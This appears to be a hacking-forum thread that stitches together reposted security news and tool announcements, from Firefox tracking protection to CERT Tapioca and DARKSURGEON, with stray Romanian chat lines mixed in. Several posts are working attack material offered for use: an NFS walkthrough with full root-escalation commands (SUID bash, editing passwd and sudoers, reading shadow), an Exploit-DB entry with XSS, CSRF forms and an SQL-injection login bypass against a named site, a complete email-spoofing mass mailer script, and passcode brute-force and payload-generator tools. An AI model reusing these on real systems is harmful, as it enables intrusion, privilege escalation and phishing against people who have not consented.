Fi8sVrs

The next October 2018 update for Firefox will include tracking protection as well as adding an additional layer of protection that will protect its users from being crypto mining websites. Tracking Protection in Firefox will be enabled by default as it is an essential part of today’s Internet. Most users don’t know that this feature exists because it is under so many sub menus. Tracking Protection will protect against malicious JavaScript and also prevents data sharing between websites. “You’re often followed by scripts that collect data on where you’ve been and what you’ve done,” Mozilla noted in a Wednesday blog post. “These scripts can eat up your data, slow down your Internet experience and make you see ads for things you may or may not want to admit you looked for when you went down one of those “suggested items” rabbit holes.” Tracking protection will stop the process that logs user data for sharing between websites. This is great for Internet users as it will improve the user experience. The tracking protection feature will also prevent malicious websites from selling your information. This scale of security is good for the working professionals and business users. The protection against crypto miners, tracking cookies and threats that are blocked by the tracking protection can be very important in aiding users to evade security risks. The release of Firefox 63 will also be simple to use with new UI elements that provide easy toggle tracking protection. The aim of the tracking protection is to prevent unwanted advertisements, social sharing scripts and analytics. At present, you won’t be able to block the cryptocurrency mining websites with Firefox itself, however in the meantime you can install add-ons for privacy and blocking crypto mining activities. Mozilla foundation also released the roadmap for 2018 by featuring many improvements that will improve the life of developers. Via latesthackingnews.com

Overview CERT Tapioca is a utility for testing mobile or any other application using MITM techniques. CERT Tapioca development was sponsored by the United States Army Armament Research, Development and Engineering Center (ARDEC) as well as the United States Department of Homeland Security (DHS). Installation requirements: Supported platforms include: Raspbian (Jessie or Stretch), Centos 7, RedHat Enterprise Linux 7, Fedora (24 through 28), or Ubuntu (14.04, 16.04, or 18.04). Other platforms may work, but the installer has only been tested on these distros. 1GB of RAM Upstream internet connectivity that does not require an explicit proxy. Ability to provide wireless access to your device under test, which means either: An available wired network adapter that a wireless access point can be plugged into. A USB wireless adapter that supports HOSTAP mode. e.g. https://smile.amazon.com/TP-Link-N150-Wireless-Adapter-TL-WN722N/dp/B002SZEOLG NOTE: CERT Tapioca installation will transform your system into a Tapioca "appliance". It is not recommended to install it on a system that you use for other purposes. Pre-installation Install a supported Linux distribution on your machine. Running on bare metal and in a virtual machine are supported. Any installation style (from text-only through full GUI) for the host OS is supported. Just ensure: Internet connectivity is working. A user named "tapioca" exists, and has administrative privileges. The "tapioca" user is logged in. Client connectivity options Before installing Tapioca, decide how you will be providing network connectivity to the clients under test. Options include: Use a wired network adapter. This adapter should be configured to use the IP 10.0.0.1/24 before attempting installation. Other addressing schemes can be used, but will require editing tapioca.cfg and /etc/dhcp/dhcpd.conf Use a wireless USB adapter that supports HOSTAP mode. Security notes CERT Tapioca requires root privileges for several capabilities that it uses. For this reason, the Tapioca installer configures a system to not prompt the user for sudo privileges. Any user with access to the CERT Tapioca system will have root privileges. The "Full HTTPS inspection" certificate/key combination is static across all CERT Tapioca installations. For this reason, any system or device that has the full HTTPS inspection mitmproxy root CA certificate installed should not be used on untrusted networks. The same capability that allows you to use Tapioca to fully inspect HTTPS traffic can allow anyone else with a CERT Tapioca installation to perform the same inspection. Installation Obtain the Tapioca code. This can be accomplished by performing a git clone of the Tapioca repository, or by downloading and extracting a zip file of the repository. Ensure that the Tapioca code lives in the /home/tapioca/tapioca directory. If you have obtained Tapioca via a zip file, this may require that you rename the tapioca-master directory to tapioca. Run the installer: [tapioca@localhost tapioca]$ ./install_tapioca.sh Follow any prompts. Reboot when done. If given a choice, log in with the tapioca user and choose the Xfce login session. If for any reason the installation fails, check and correct any relevant errors and run ./install_tapioca.sh again. Tapioca Quick Start Testing Apps on Wireless Devices Using HOSTAP adapter Connect a HOSTAP-capable WiFi adapter to your Tapioca machine. Click the Software WiFi AP button (Radio tower) to enable your wireless access point. Connect your device to the Tapioca access point. Click the Tapioca GUI button to launch the main testing interface. Testing Apps on Wireless Devices Using Access point Configure the Tapioca machine second network adapter to be 10.0.0.1/24 If this network was not already configured at install time, re-run ./install_tapioca.sh or manually edit tapioca.cfg to specify this network device name for internal_net. Connect the access point uplink port to the Tapioca LAN port. Connect your device to the access point. Click the Tapioca GUI button to launch the main testing interface. Testing Apps on Virtual Machines Configure the Tapioca machine second second network adapter to be 10.0.0.1/24 If this network was not already configured at install time, re-run ./install_tapioca.sh or manually edit tapioca.cfg to specify this network device name for internal_net. Click the Tapioca GUI button to launch the main testing interface. Tapioca Desktop Layout Once you have installed Tapioca, you should end up with a screen like the below. Individual icons may vary slightly across platforms. Browse results Open a file manager to view already-tested applications. Terminal Open a terminal to allow manual execution of scripts. Web Browser Open Chromium web browser. Enable software WiFi AP This button will configure a connected WiFi adapter for HOSTAP mode. This will allow you to wirelessly connect your client device to Tapioca for traffic inspection. Tapioca GUI Launch the main Tapioca interface. Capture all traffic Use tcpdump to capture all raw network traffic without interfering. SSL validation Use mitmproxy to intercept HTTP/HTTPS traffic, using an untrusted root certificate. Any HTTPS traffic that passes through is an indication of a client that isn't validating HTTPS certificates. Full HTTPS inspection Use mitmproxy to intercept HTTP/HTTPS traffic, using a root certificate that has been installed on the client system. This allows full inspection of non-pinned HTTPS traffic. Stop capture Stop any (tcpdump, mitmproxy) capture. Tapioca GUI usage While the Tapioca platform provides buttons to launch individual tests, the Tapioca GUI will provide most of the capabilities that you will need. Tapioca Capture Modes To be able to run all of the reports included with Tapioca, three captures are required.: All traffic with tcpdump In "All traffic with tcpdump" mode, Tapioca doesn't interfere with HTTPS negotiation. This allows Tapioca to inspect the HTTPS handshakes that occur between a client and a server. If a client is using insecure crypto, or protocols other than HTTP/HTTPS, then the tcpdump capture will be required to detect this. This capture is required to allow the Crypto test report to be generated. Verify SSL validation In "Verify SSL validation" mode, Tapioca will intercept web traffic, and the HTTPS communications between the client and Tapioca will use an invalid root CA certificate. Any client that allows HTTPS traffic through Tapioca without warning is vulnerable to malicious interception. Despite the client using HTTPS, it is not receiving the benefits that HTTPS aims to provide. This capture is required to allow the SSL test report to be generated. Full HTTPS inspection In "Full HTTPS inspection" mode, Tapioca will intercept web traffic, and the HTTPS communications between the client and Tapioca will use a valid root CA certificate that has been installed on the client. This allows searching for content in web traffic, even if it has been encrypted with HTTPS. This capture is required to allow Search capabilities within encrypted, but not pinned, network traffic. Strategies for Using Tapioca For each client application being tested, run through the normal operations for using the client while the traffic is being captured in each of the three modes: All traffic with tcpdump Verify SSL validation Full HTTPS inspection At the end of each test, be sure to stop the capture using the Tapioca GUI or by clicking the stop sign icon at the bottom of the screen. Before starting the next test, be sure to terminate the application being tested. An uninstall of the application between tests will ensure thoroughness of the test. For example, some applications install a service that continues to run even after the application is terminated. After traffic is captured in all three modes, press the "Generate reports" button. The SSL test and the Crypto test have PASSED/FAILED statuses. The network connectivity test simply generates a report of hosts contacted. Results for all three tests can be viewed by using the Tapioca GUI. When entering any data into a form, always use the same values. This can allow you to search for your data. For example, if you are presented with a password field, if you always use "passssss" that will allow you to search for that value in the traffic. Manual Execution of Scripts If you are not using the Tapioca GUI, need to troubleshoot problems, or if you would like to run the utilities against existing network captures (e.g. a pcap file), there are command-line utilities: checkcrypto.py - Validate that HTTPS negotiations are secure (pcap required) checknet.py - Enumerate hosts contacted using which protocols, as well as which host names are resolved (pcap required) checkssl.py - Validate that a client is verifying that an SSL certificate is issued by a trusted provider (mitmproxy log file required) search.py - Search for strings in network captures (pcap and/or mitmproxy log file required) Download: tapioca-master.zip git clone https://github.com/CERTCC/tapioca.git Source

Security researchers have discovered a severe vulnerability in EOS blockchain platform that could allow remote hackers to take complete control over the node servers that maintain the technology. EOS is an open source smart contract platform, known as 'Blockchain 3.0,' that allows developers to build decentralized applications over blockchain infrastructure, just like Ethereum. Discovered by Chinese security researchers at Qihoo 360—Yuki Chen of Vulcan team and Zhiniang Peng of Core security team—the vulnerability is a buffer out-of-bounds write issue which resides in the function used by nodes server to parse contracts. To achieve remote code execution on a targeted node, all an attacker needs to do is upload a maliciously crafted WASM file (a smart contract) written in WebAssembly to the server. As soon as the vulnerable process parser reads the WASM file, the malicious payload gets executed on the node, which could then also be used to take control over the supernode in EOS network—servers that collect transaction information and pack it into blocks. Once the attackers gained control over the supernode, they could eventually "pack the malicious contract into the new block and further control all nodes of the EOS network." Researchers have detailed how to reproduce the vulnerability and also released a proof-of-concept exploit, along with a video demonstration, which you can watch on their blog post. The pair responsibly reported the vulnerability to the maintainers of the EOS project, and they have already released a fix for the issue on GitHub. Via thehackernews.com

SQLi Exploiter WARNING: This is not a script kiddie tool! Usage requires detailed knowledge of the vulnerability, a thorough understand of the functionality available in the affected RDBMS, and the ability to write Python. The good news is that it is highly configurable. Born out of a need to exploit SQL injection vulnerabilities that sqlmap just couldn't find. Always try sqlmap first. It is highly customizable and only fails in very complicated injection scenarios. However, when it does fail, use this. Enjoy! - Tim (@lanmaster53) Tomes Getting Started Install the dependencies: pip install -r REQUIREMENTS.txt Edit the config.py file and follow the numbered configuration steps. Run the script: python ./sqli-exploiter.py Developed and tested in Python 3, but may also work in Python 2. I have no idea... Download: sqli-exploiter-master.zip or: git clone https://github.com/lanmaster53/sqli-exploiter.git Source

After solving several OSCP Challenges we decided to write the article on the various method used for Linux privilege escalation, that could be helpful for our readers in their penetration testing project. In this article, we will learn how to exploit a misconfigured NFS share to gain root access to a remote host machine. Table of contents Introduction of NFS Misconfigured NFS Lab setup Scanning NFS shares Nmap script showmount Exploiting NFS server for Privilege Escalation via: Bash file C program file Nano/vi Obtain shadow file Obtain passwd file Obtain sudoers file Let’s Start!! Network File System (NFS): Network File System permits a user on a client machine to mount the shared files or directories over a network. NFS uses Remote Procedure Calls (RPC) to route requests between clients and servers. Although NFS uses TCP/UDP port 2049 for sharing any files/directories over a network. Misconfigured NFS Lab setup Basically, there are three core configuration files (/etc/exports, /etc/hosts.allow, and /etc/hosts.deny) you will need to configure to set up an NFS server. BUT to configure weak NFS server we will look only /etc/export file. To install NFS service execute below command in your terminal and open /etc/export file for configuration. sudo apt-get update sudo apt install nfs-kernel-server nano /etc/exports The /etc/exports file holds a record for each directory that you expect to share within a network machine. Each record describes how one directory or file is shared. Apply basic syntax for configuration: Directory Host-IP(Option-list) There are various options will define which type of Privilege that machine will have over shared directory. rw: Permit clients to read as well as write access to shared directory. ro: Permit clients to Read-only access to shared directory.. root_squash: This option Prevents file request made by user root on the client machine because NFS shares change the root user to the nfsnobody user, which is an unprivileged user account. no_root_squash: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implication. async: It will speed up transfers but can cause data corruption as NFS server doesn’t wait for the complete write operation to be finished on the stable storage, before replying to the client. sync: The sync option does the inverse of async option where the NFS server will reply to the client only after the data is finally written to the stable storage. Hopefully, it might be clear to you, how to configure the /etc/export file by using a particular option. An NFS system is considered weak or Misconfigured when following entry/record is edit into it for sharing any directory. /home *(rw,no_root_squash) Above entry shows that we have shared /home directory and allowed the root user on the client to access files to read/ write operation and * sign denotes connection from any Host machine. After then restart the service with help of the following command. sudo /etc/init.d/nfs-kernel-server restart Scanning NFS shares Nmap You can take help of Nmap script to scan NFS service in target network because it reveals the name of share directory of target’s system if port 2049 is opened. nmap -sV --script=nfs-showmount 192.168.1.102 Basically nmap exports showmount -e command to identify the shared directory and here we can clearly observe /home * is shared directory for everyone in the network. Showmount The same thing can be done manually by using showmount command but for that install nfs-common package on your local machine with help of the following command. apt-get install nfs-common showmount -e 192.168.1.102 Exploiting NFS server for Privilege Escalation Bash file Now execute below command on your local machine to exploit NFS server for root privilege. mkdir /tmp/raj mount -t nfs 192.168.1.102:/home /tmp/raj cp /bin/bash . chmod +s bash ls -la bash Above command will create a new folder raj inside /tmp and mount shared directory /home inside /tmp/raj. Then upload a local exploit to gain root by copying bin/bash and set suid permission. Use df -h command to get summary of the amount of free disk space on each mounted disk. First, you need to compromise the target system and then move to privilege escalation phase. Suppose you successfully login into victim’s machine through ssh. Now we knew that /home is shared directory, therefore, move inside it and follow below steps to get root access of victim’s machine. cd /home ls ./bash -p id whoami So, it was the first method to pwn the root access with help of bin/bash if NFS system is configured weak. C Program Similarly, we can use C language program file for root privilege escalation. We have generated a C-Program file and copied it into /tmp/raj folder. Since it is c program file therefore first we need to compile it and then set suid permission as done above. cp asroot.c /tmp/root cd /tmp/raj gcc asroot.c -o shell chmod +s shell Now repeat the above process and run shell file to obtained root access. cd /home ls ./shell id whoami So, it was the second method to pwn the root access with help of bin/bash via c-program if NFS system is misconfigured. Nano/Vi Nano and vi editor both are most dangerous applications that can lead to privilege escalation if share directly or indirectly. In our case, it not shared directly but still, we can use any application for exploiting root access. Follow below steps: cp /bin/nano chmod 4777 nano ls -la nano Since we have set suid permission to nano therefore after compromising target’s machine at least once we can escalate root privilege through various techniques. cd /home ls ./nano -p etc/shadow When you will execute above command it will open shadow file, from where you can copy the hash password of any user. Here I have copied hash password of the user: raj in a text file and saved as shadow then use john the ripper to crack that hash password. Awesome!!! It tells raj having password 123. Now either you can login as raj and verify its privilege or follow next step. Passwd file Now we know the password of raj user but we are not sure that raj has root privilege or not, therefore, we can add raj into the root group by editing etc/passwd file. Open the passwd file with help of nano and make following changes ./nano -p etc/passwd raj:x:0:0:,,,:/home/raj:/bin/bash Now use su command to switch user and enter the password found for raj. su raj id whoami Great!!! This was another way to get root access to target’s machine. Sudoers file We can also escalate root privilege by editing sudoers file where we can assign ALL privilege to our non-root user (ignite). Open the sudoers file with help of nano and make following changes ./nano -p etc/sudoers ignite ALL=(ALL:ALL) NOPASSWD: ALL Now use sudo bash command to access root terminal and get root privilege sudo bash id whoami Conclusion: Thus we saw the various approach to escalated root privilege if port 2049 is open for NFS services and server is weak configured. For your practice, you can play with ORCUS which is a vulnerable lab of vulnhub and read the article from here. Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here Source: hackingarticles.in

iOS Restriction Passcode Brute Force Overview This version of the application is written in Python, which is used to crack the restriction passcode of an iPhone/iPad takes advantage of a flaw in unencrypted backups allowing the hash and salt to be discovered. DEPENDENCIES This has been tested with Python 2.7 and Python 3.6 Requires Passlib Install with pip install passlib Usage usage: iOSCrack.py [-h] [-a] [-c] [-b folder] [-t] a script to crack the restriction passcode of an iDevice optional arguments: -h, --help show this help message and exit -a, --automatically automatically finds and cracks hashes -c, --cli prompts user for input -b folder, --backup folder where backups are located -t, --test runs unittest How to Use 1. Clone repository git clone https://github.com/thehappydinoa/iOSRestrictionBruteForce && cd iOSRestrictionBruteForce 2. Make sure to use iTunes or libimobiledevice to backup the iOS device to computer 3. Run ioscrack.py with the auto option python ioscrack.py -a How to Test Run ioscrack.py with the test option python ioscrack.py -t How it Works Done by using the pbkdf2 hash with the Passlib python module Trys the top 20 four-digit pins Trys birthdays between 1900-2017 Brute force pins from 1 to 9999 Adds successful pins to local database How to Protect Against Encrpyt backups Backup only on trusted computers Contributing Best ways to contribute Star it on GitHub - if you use it and like it please at least star it Promote Open issues Submit fixes and/or improvements with Pull Requests Promotion Like the project? Please support to ensure continued development going forward: Star this repo on GitHub Follow me Twitter GitHub Acknowledgments yuejd Download: iOSRestrictionBruteForce-master.zip Source

incearca sa dai format, se vede ca naiba pe tema alba

SMTP-Mailer: A python script to send emails using SMTP protocol . Easy way to spoof emails. smtp.py #!/usr/bin/env python # -*- coding: utf-8 -*- import smtplib from email.MIMEMultipart import MIMEMultipart from email.MIMEText import MIMEText def checkConnection(server, port, tls, user, passwd): try: connect = smtplib.SMTP(server, port) connect.ehlo() if tls: connect.starttls() connect.ehlo() connect.login(user, passwd) return connect except: return False def inboxEmail(server, port, tls, user, passwd, maillist, From, subject, mailtext): smtpConnect = checkConnection(server, port, tls, user, passwd) emails = len(maillist) for success, sendto in enumerate(maillist): content = MIMEMultipart() content['From'] = From content['To'] = sendto.rstrip() content['Subject'] = subject htmlscript = mailtext.rstrip() content.attach(MIMEText(htmlscript, 'html')) print('Pr0 SMTP Email Sender >>> You are going to send to '+sendto.rstrip()) smtpConnect.sendmail(From, sendto.rstrip(), content.as_string()) smtpConnect.quit() print('\nBastians Email Sender >>> Email to '+str(success+1)+'/'+str(emails)+' Adresses sended!\n') print""" # _____ __ __ _______ _____ __ __ _ _ # / ____| | \/ | |__ __| | __ \ | \/ | (_) | | # | (___ | \ / | | | | |__) | | \ / | __ _ _ | | ___ _ __ # \___ \ | |\/| | | | | ___/ | |\/| | / _` | | | | | / _ \ | '__| # ____) | | | | | | | | | | | | | | (_| | | | | | | __/ | | # |_____/ |_| |_| |_| |_| |_| |_| \__,_| |_| |_| \___| |_| MOHAMED NOUR """ smtpServer = raw_input('\nPlease enter the SMTP Server (Hostname or IP Adress): ') smtpPort = input('Please enter the SMTP Port : ') smtpTLS = input('Secure the Email with TLS ? (Yes [1] or No [0]): ') smtpUser = raw_input('Enter the SMTP Username: ') smtpPass = raw_input('Enter the SMTP Password: ') if checkConnection(smtpServer, smtpPort, smtpTLS, smtpUser, smtpPass,): print('\nPr0 SMTP Email Sender >>> SMTP Status // Connected!') sendFrom = raw_input('\nEnter the Receiver: ') sendSubj = raw_input('Enter the Subject: ') userlist = raw_input('Enter the Path of the Email List: ') try: maillist = open(userlist).readlines() print('\n Pr0 SMTP Email Sender >>> I found currently '+str(len(maillist))+' Email Adresses.') htmlscript = raw_input('\nEnter here the Path to your HTML Script: ') try: html = open(htmlscript).read() raw_input('ENTER, to send the HTML Script to '+str(len(maillist))+' ...\n') try: inboxEmail(smtpServer, smtpPort, smtpTLS, smtpUser, smtpPass, maillist, sendFrom, sendSubj, html) except: print('ERROR: I CANT USE THE EMAIL!') except: print('The HTML File cannot get readed yet or is empty.') except: print('The .txt File cannot get readed or is empty.') else: print('I cant connect to the Server :/') Source

Payload List: Binaries Payloads 1) Android 2) Windows 3) Linux 4) Mac OS Scripting Payloads 1) Python 2) Perl 3) Bash Web Payloads 1) ASP 2) JSP 3) War Encrypters 1) APK Encrypter 2) Python Encrypter The author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent is illegal and punished by law. Download: Terminator-master.zip or git clone https://github.com/MohamedNourTN/Terminator.git Mirror: terminator.py Source

# Exploit Title: Superfood - Restaurants & Online Food Order System 1.0 - Persistent cross site scripting / Cross site request forgery / Admin panel Authentication bypass # Date: 2018-05-20 # Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com # Vendor Homepage: https://codecanyon.net/item/superfood-restaurants-online-food-order-system/16855836?s_rank=30 # Version: 1.0 # Tested on: Kali linux ==================================================== # Description: Superfood - Restaurants & Online Food Order System 1.0 suffers from multiple vulnerabilities : ==================================================== # POC 1 : Persistent cross site scripting : 1) After creating an account , go to your profile. 2) Navigate to "Update profile" and put this payload : "/><script>alert('xss')</script> 3) You will have an alert box in the page . ==================================================== # POC 2 : CSRF : Attacker can change user's authentication directly : # User's CSRF exploit : <html> <head> <title>CSRF POC</title> </head> <body> <form action="http://restaurant.thesoftking.com/updateprofile" method="post"> <input type="hidden" name="name" value="anything"> <input type="hidden" name="mobile" value="1000000000"> <input type="hidden" name="address" value="anything"> </form> <script> document.forms[0].submit(); </script> </body> </html> # Admin page CSRF exploit : <form action="http://restaurant.thesoftking.com/admin/setgeneral.php" method="post"> <input name="name" value="exploit" type="hidden"> <input name="wcmsg" value="test" type="hidden"> <input name="address" value="test2" type="hidden"> <input name="mobile" value="1000000" type="hidden"> <input name="email" value="test@test.com" type="hidden"> <input name="currency" value="decode" type="hidden"> </form> <script> document.forms[0].submit(); </script> ==================================================== # POC 3 : Authentication bypass : # Attacker can bypass admin panel without any authentication : Path : /admin Username : ' or 0=0 # Password : anything ==================================================== Source: exploit-db.com

HTTPoxy Exploit Scanner by 1N3 @CrowdShield (https://crowdshield.com) Last Updated: 20160720 ABOUT: PoC/Exploit scanner to scan common CGI files on a target URL for the HTTPoxy vulnerability. Httpoxy is a set of vulnerabilities that affect application code running in CGI, or CGI-like environments. For more details, go to https://httpoxy.org. REQUIREMENTS: Requires ncat to establish reverse session USAGE: ./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000 This will scan https://target.com with a list of common CGI files while injecting a Proxy header back to a given IP:PORT. A reverse listener will catch the incoming connection to confirm the remote site is vulnerable. DISCLAIMER: I take no responsibility for wrong doing or misuse of this exploit. Download: HTTPoxyScan-master.zip or: git clone https://github.com/1N3/HTTPoxyScan.git Source

doua stiri am postat man

salt-scanner Linux vulnerability scanner based on Salt Open and Vulners audit API, with Slack notifications and JIRA integration Features Slack notification and report upload JIRA integration OpsGenie integration Requirements Salt Open 2016.11.x (salt-master, salt-minion)¹ Python 2.7 salt (you may need to install gcc, gcc-c++, python dev) slackclient jira opsgenie-sdk Note: Salt Master and Minion versions should match. Salt-Scanner supports Salt version 2016.11.x. if you are using version 2017.7.x, replace "expr_form" with "tgt_type" in salt-scanner.py. Usage $ ./salt-scanner.py -h ========================================================== Vulnerability scanner based on Vulners API and Salt Open _____ _ _ _____ / ___| | | | / ___| \ `--. __ _| | |_ \ `--. ___ __ _ _ __ _ __ ___ _ __ `--. \/ _` | | __| `--. \/ __/ _` | '_ \| '_ \ / _ \ '__| /\__/ / (_| | | |_ /\__/ / (_| (_| | | | | | | | __/ | \____/ \__,_|_|\__| \____/ \___\__,_|_| |_|_| |_|\___|_| Salt-Scanner 0.1 / by 0x4D31 ========================================================== usage: salt-scanner.py [-h] [-t TARGET_HOSTS] [-tF {glob,list,grain}] [-oN OS_NAME] [-oV OS_VERSION] optional arguments: -h, --help show this help message and exit -t TARGET_HOSTS, --target-hosts TARGET_HOSTS -tF {glob,list,grain}, --target-form {glob,list,grain} -oN OS_NAME, --os-name OS_NAME -oV OS_VERSION, --os-version OS_VERSION $ sudo SLACK_API_TOKEN="EXAMPLETOKEN" ./salt-scanner.py -t "*" ========================================================== Vulnerability scanner based on Vulners API and Salt Open _____ _ _ _____ / ___| | | | / ___| \ `--. __ _| | |_ \ `--. ___ __ _ _ __ _ __ ___ _ __ `--. \/ _` | | __| `--. \/ __/ _` | '_ \| '_ \ / _ \ '__| /\__/ / (_| | | |_ /\__/ / (_| (_| | | | | | | | __/ | \____/ \__,_|_|\__| \____/ \___\__,_|_| |_|_| |_|\___|_| Salt-Scanner 0.1 / by 0x4D31 ========================================================== + No default OS is configured. Detecting OS... + Detected Operating Systems: - OS Name: centos, OS Version: 7 + Getting the Installed Packages... + Started Scanning '10.10.10.55'... - Total Packages: 357 - 6 Vulnerable Packages Found - Severity: Low + Started Scanning '10.10.10.56'... - Total Packages: 392 - 6 Vulnerable Packages Found - Severity: Critical + Finished scanning 2 host (target hosts: '*'). 2 Hosts are vulnerable! + Output file created: 20170622-093138_232826a7-983f-499b-ad96-7b8f1a75c1d7.txt + Full report uploaded to Slack + JIRA Issue created: VM-16 + OpsGenie alert created$ ./salt-scanner.py -h ========================================================== Vulnerability scanner based on Vulners API and Salt Open _____ _ _ _____ / ___| | | | / ___| \ `--. __ _| | |_ \ `--. ___ __ _ _ __ _ __ ___ _ __ `--. \/ _` | | __| `--. \/ __/ _` | '_ \| '_ \ / _ \ '__| /\__/ / (_| | | |_ /\__/ / (_| (_| | | | | | | | __/ | \____/ \__,_|_|\__| \____/ \___\__,_|_| |_|_| |_|\___|_| Salt-Scanner 0.1 / by 0x4D31 ========================================================== usage: salt-scanner.py [-h] [-t TARGET_HOSTS] [-tF {glob,list,grain}] [-oN OS_NAME] [-oV OS_VERSION] optional arguments: -h, --help show this help message and exit -t TARGET_HOSTS, --target-hosts TARGET_HOSTS -tF {glob,list,grain}, --target-form {glob,list,grain} -oN OS_NAME, --os-name OS_NAME -oV OS_VERSION, --os-version OS_VERSION $ sudo SLACK_API_TOKEN="EXAMPLETOKEN" ./salt-scanner.py -t "*" ========================================================== Vulnerability scanner based on Vulners API and Salt Open _____ _ _ _____ / ___| | | | / ___| \ `--. __ _| | |_ \ `--. ___ __ _ _ __ _ __ ___ _ __ `--. \/ _` | | __| `--. \/ __/ _` | '_ \| '_ \ / _ \ '__| /\__/ / (_| | | |_ /\__/ / (_| (_| | | | | | | | __/ | \____/ \__,_|_|\__| \____/ \___\__,_|_| |_|_| |_|\___|_| Salt-Scanner 0.1 / by 0x4D31 ========================================================== + No default OS is configured. Detecting OS... + Detected Operating Systems: - OS Name: centos, OS Version: 7 + Getting the Installed Packages... + Started Scanning '10.10.10.55'... - Total Packages: 357 - 6 Vulnerable Packages Found - Severity: Low + Started Scanning '10.10.10.56'... - Total Packages: 392 - 6 Vulnerable Packages Found - Severity: Critical + Finished scanning 2 host (target hosts: '*'). 2 Hosts are vulnerable! + Output file created: 20170622-093138_232826a7-983f-499b-ad96-7b8f1a75c1d7.txt + Full report uploaded to Slack + JIRA Issue created: VM-16 + OpsGenie alert created You can also use Salt Grains such as ec2_tags in target_hosts: $ sudo ./salt-scanner.py --target-hosts "ec2_tags:Role:webapp" --target-form grain Slack Alert TODO Clean up the code and add some error handling Use Salt Grains for getting the OS info and installed packages [1] Salt in 10 Minutes: https://docs.saltstack.com/en/latest/topics/tutorials/walkthrough.html Download: salt-scanner-master.zip or: git clone https://github.com/0x4D31/salt-scanner.git Source

Purpose of this Article This article demonstrates a vulnerability found in the 'Super Router' router provided by the internet service provider TalkTalk to its customers. The vulnerability discovered allows the attacker to discover the Super Router's WiFi Password by attacking the WPS feature in the router which is always switched on, even if the WPS pairing button is not used. The purpose of this article is to encourage TalkTalk to immediately patch this vulnerability in order to protect their customers. Tools Used Windows Based Computer (Other tools on unix platforms may be just as effective, but for the purpose of this article we will focus on one) Wireless Network Adapter TalkTalk Router within Wireless Network Adapter Range Software 'Dumpper' available on Sourceforge (Tested with v.91.2) Steps to Reproduce Step 1: Run Dumpper and navigate to the WPS tab and select the target WiFi BSSID. Step 2: Click 'WpsWin' to begin probing the BSSID for the WPS pin. Step 3: After a couple of seconds, the WiFi access key to this network will be displayed bottom right. Scale of Vulnerability This method has proven successful on multiple TalkTalk Super Routers belonging to consenting parties which is enough to suggest that this vulnerability affects all TalkTalk Super Routers of this particular model/version. TalkTalk have been notified of this vulnerability in the past and have failed to patch it many years later. It is also documented across various community forums. Links: 2014 TalkTalk Forum Post: D-Link RT2860 [Security issue] 2014 BroadbandBanter Forum Post: TalkTalk DSL-3680 WPS security vulnerability 2016 Hashkiller Forum Post: WPA Packet Cracking - TalkTalk Disclosure TalkTalk have been notified of this vulnerability on the day of the article being written (21 May 2018) Typically a 30 day period from discovery to public release would be granted. However, in this case, as TalkTalk were made aware of this exploit back in 2014, public release is immediate. Date Disclosure 21 May 2018 Delivered to TalkTalk. 21 May 2018 Date of public release. Reference: https://securityaffairs.co/wordpress/72805/laws-and-regulations/talktalk-super-routers-flaws.html Source: https://www.indigofuzz.com/article.php?docid=talktalk1430

Sandmap is a tool supporting network and system reconnaissance using the massive Nmap engine. It provides a user-friendly interface, automates and speeds up scanning and allows you to easily use many advanced scanning techniques. Description Sandmap is a tool supporting network and system reconnaissance using the massive Nmap engine. It provides a user-friendly interface, automates and speeds up scanning and allows you to easily use many advanced scanning techniques. Key Features simple CLI with the ability to run pure Nmap engine predefined scans included in the modules support Nmap Scripting Engine (NSE) with scripts arguments TOR support (with proxychains) multiple scans at one time at this point: 31 modules with 459 scan profiles How To Use It's simple: # Clone this repository git clone --recursive https://github.com/trimstray/sandmap # Go into the repository cd sandmap # Install ./setup.sh install # Run the app sandmap symlink to bin/sandmap is placed in /usr/local/bin man page is placed in /usr/local/man/man8 Command Line Before using the Sandmap read the Command Line introduction. Configuration The etc/main.cfg configuration file has the following structure: # shellcheck shell=bash # Specifies the default destination. # Examples: # - dest="127.0.0.1,8.8.8.8" dest="127.0.0.1" # Specifies the extended Nmap parameters. # Examples: # - params="--script ssl-ccs-injection -p 443" params="" # Specifies the default output type and path. # Examples: # - report="xml" report="" # Specifies the TOR connection. # Examples: # - tor="true" tor="" # Specifies the terminal type. # Examples: # - terminal="internal" terminal="internal" Requirements Sandmap uses external utilities to be installed before running: nmap xterm proxychains This tool working with: GNU/Linux or BSD (testing on Debian, CentOS and FreeBSD) Bash (testing on 4.4.19) Nmap (testing on 7.70) Also you will need root access. Other Modules Available modules: 31 Available scan profiles: 459 Contributing See this. Download: sandmap-master.zip or: git clone https://github.com/trimstray/sandmap.git Source

The majority of the modern economy's logistics is implemented via shipping vessels controlled through systems that embody a combination of the worst parts of a corporate network, ICS, and embedded systems. These systems were largely designed decades ago and are rarely, if ever, updated - yet are exposed to a large number of attack surfaces on the internet and via radio-frequency attacks. This talk will cover the protocols used by the commonly implemented systems found in both commercial and private maritime vessels - including large capacity tankers and container ships - and the shoreside infrastructure used to communicate with, and issue commands to, the shipboard systems. We will see how this infrastructure can be attacked, and how it in turn can be used to carry out significant attacks that could cause major disruption to the world's economy. Recorded at NolaCon 2018

DARKSURGEON is a Windows packer project to empower incident response, digital forensics, malware analysis, and network defense. https://darksurgeon.io Darksurgeon is a Windows packer project to empower incident response, digital forensics, malware analysis, and network defense. Darksurgeon has three stated goals: Accelerate incident response, digital forensics, malware analysis, and network defense with a preconfigured Windows 10 environment complete with tools, scripts, and utilities. Provide a framework for defenders to customize and deploy their own programmatically-built Windows images using Packer and Vagrant. Reduce the amount of latent telemetry collection, minimize error reporting, and provide reasonable privacy and hardening standards for Windows 10. If you haven’t worked with packer before, this project has a simple premise: Provide all the tools you need to have a productive, secure, and private Windows virtual machine so you can spend less time tweaking your environment and more time fighting bad guys. Please note this is an alpha project and it will be subject to continual development, updates, and package breakage. Development Principles Darksurgeon is based on a few key development principles: Modularity is key. Each component of the installation and configuration process should be modular. This allows for individuals to tailor their packer image in the most flexible way. Builds must be atomic. A packer build should either complete all configuration and installation tasks without errors, or it should fail. A packer image with missing tools is a failure scenario. Hardened out of the box. To the extent that it will not interfere with investigative workflows, all settings related to proactive hardening and security controls should be enabled. Further information on Darksurgeon security can be found later in this post. Instrumented out of the box. To the extent that it will not interfere with investigative workflows, Microsoft Sysmon, Windows Event Logging, and osquery will provide detailed telemetry on host behavior without further configuration. Private out of the box. To the extent 